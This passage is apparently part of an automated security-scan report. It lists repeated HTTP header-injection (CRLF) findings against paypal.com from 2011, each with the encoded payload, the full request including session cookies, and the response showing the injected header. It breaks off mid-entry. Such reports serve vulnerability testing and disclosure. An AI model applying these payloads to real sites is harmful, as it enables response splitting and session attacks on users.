...[SNIP]...

1.49. https://www.paypal.com/en_US/i/pui/core/login_body_bg.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/login_body_bg.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 356ba%0d%0a5ea4e92d6f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /356ba%0d%0a5ea4e92d6f5/i/pui/core/login_body_bg.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:43 GMT
Server: Apache
Location: https://www.paypalobjects.com/356ba
5ea4e92d6f5/i/pui/core/login_body_bg.jpg
Content-Length: 285
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.50. https://www.paypal.com/en_US/i/pui/core/login_body_bg.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/login_body_bg.jpg

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 133e4%0d%0a3277d0ea53c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/133e4%0d%0a3277d0ea53c/pui/core/login_body_bg.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:48 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/133e4
3277d0ea53c/pui/core/login_body_bg.jpg
Content-Length: 289
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.51. https://www.paypal.com/en_US/i/pui/core/login_body_bg.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/login_body_bg.jpg

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a315e%0d%0a4c1cf564d8b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/a315e%0d%0a4c1cf564d8b/core/login_body_bg.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:52 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/a315e
4c1cf564d8b/core/login_body_bg.jpg
Content-Length: 287
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.52. https://www.paypal.com/en_US/i/pui/core/login_body_bg.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/login_body_bg.jpg

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 9881a%0d%0af1cfb777330 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/pui/9881a%0d%0af1cfb777330/login_body_bg.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.182.1313112145907951

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 01:22:56 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/pui/9881a
f1cfb777330/login_body_bg.jpg
Content-Length: 286
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.53. https://www.paypal.com/en_US/i/pui/core/nav_sprite.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/nav_sprite.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a09a7%0d%0ad309debe012 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a09a7%0d%0ad309debe012/i/pui/core/nav_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:56 GMT
Server: Apache
Location: https://www.paypalobjects.com/a09a7
d309debe012/i/pui/core/nav_sprite.gif
Content-Length: 282
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.54. https://www.paypal.com/en_US/i/pui/core/nav_sprite.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/nav_sprite.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3268a%0d%0a909e12b7e1c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/3268a%0d%0a909e12b7e1c/pui/core/nav_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:59 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/3268a
909e12b7e1c/pui/core/nav_sprite.gif
Content-Length: 286
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.55. https://www.paypal.com/en_US/i/pui/core/nav_sprite.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/nav_sprite.gif

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6e79b%0d%0af478b8c1117 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/6e79b%0d%0af478b8c1117/core/nav_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:04 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/6e79b
f478b8c1117/core/nav_sprite.gif
Content-Length: 284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.56. https://www.paypal.com/en_US/i/pui/core/nav_sprite.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/nav_sprite.gif

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 335fd%0d%0ad8dca832bc5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /en_US/i/pui/335fd%0d%0ad8dca832bc5/nav_sprite.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:07 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/i/pui/335fd
d8dca832bc5/nav_sprite.gif
Content-Length: 283
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.57. https://www.paypal.com/en_US/m/mid.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/m/mid.swf

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c2b38%0d%0abcdf8916ef0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c2b38%0d%0abcdf8916ef0/m/mid.swf HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:47:30 GMT
Server: Apache
Location: https://www.paypalobjects.com/c2b38
bcdf8916ef0/m/mid.swf
Content-Length: 266
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.58. https://www.paypal.com/en_US/m/mid.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/m/mid.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload da696%0d%0a99659831d9c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /en_US/da696%0d%0a99659831d9c/mid.swf HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:47:32 GMT
Server: Apache
Location: https://www.paypalobjects.com/en_US/da696
99659831d9c/mid.swf
Content-Length: 270
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.59. https://www.paypal.com/js/Customer/min/baynote.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/js/Customer/min/baynote.js

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload eb6fc%0d%0a3b528aae7a0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /eb6fc%0d%0a3b528aae7a0/Customer/min/baynote.js HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:48:44 GMT
Server: Apache
Location: https://www.paypalobjects.com/eb6fc
3b528aae7a0/Customer/min/baynote.js
Content-Length: 280
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.60. https://www.paypal.com/js/Customer/min/baynote.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/js/Customer/min/baynote.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7b4f0%0d%0a0b45c5626e6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/7b4f0%0d%0a0b45c5626e6/min/baynote.js HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 13:48:47 GMT
Server: Apache
Location: https://www.paypalobjects.com/js/7b4f0
0b45c5626e6/min/baynote.js
Content-Length: 274
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.61. https://www.paypal.com/js/Customer/min/baynote.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/js/Customer/min/baynote.js

Issue detail

